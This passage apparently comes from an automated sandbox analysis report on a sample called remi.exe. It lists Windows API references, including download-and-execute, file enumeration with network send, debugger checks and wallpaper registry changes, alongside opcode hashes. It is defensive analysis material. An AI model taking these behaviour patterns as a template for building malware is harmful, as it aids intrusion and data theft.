                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00448233
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1286116820-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                                                                                • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                                                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\remi.exe$open
                                                                                                                                                                                                                                                                                                • API String ID: 2825088817-597812332
                                                                                                                                                                                                                                                                                                • Opcode ID: d856352b29c500f65ac61f264686a0ac45c8e93dcc938b66659ffa0f0ca1f413
                                                                                                                                                                                                                                                                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d856352b29c500f65ac61f264686a0ac45c8e93dcc938b66659ffa0f0ca1f413
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                                                                                                • String ID: x@G$x@G
                                                                                                                                                                                                                                                                                                • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                                                                                                • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                                                                                                                                                                                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                                                                                • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                                                                                • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                                                                                                                                                                                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4212172061-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                                                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 301083792-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2829624132-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                                                                                                                                                                                • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                                                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                                                                                                                                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1815803762-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                                                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                                                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                                                                                • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                • String ID: <D
                                                                                                                                                                                                                                                                                                • API String ID: 1084509184-3866323178
                                                                                                                                                                                                                                                                                                • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                                                                                                                                                                                                • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                • String ID: <D
                                                                                                                                                                                                                                                                                                • API String ID: 1084509184-3866323178
                                                                                                                                                                                                                                                                                                • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                                                                                                                                                                                                • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                                • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                                                                                • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                                                                                • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
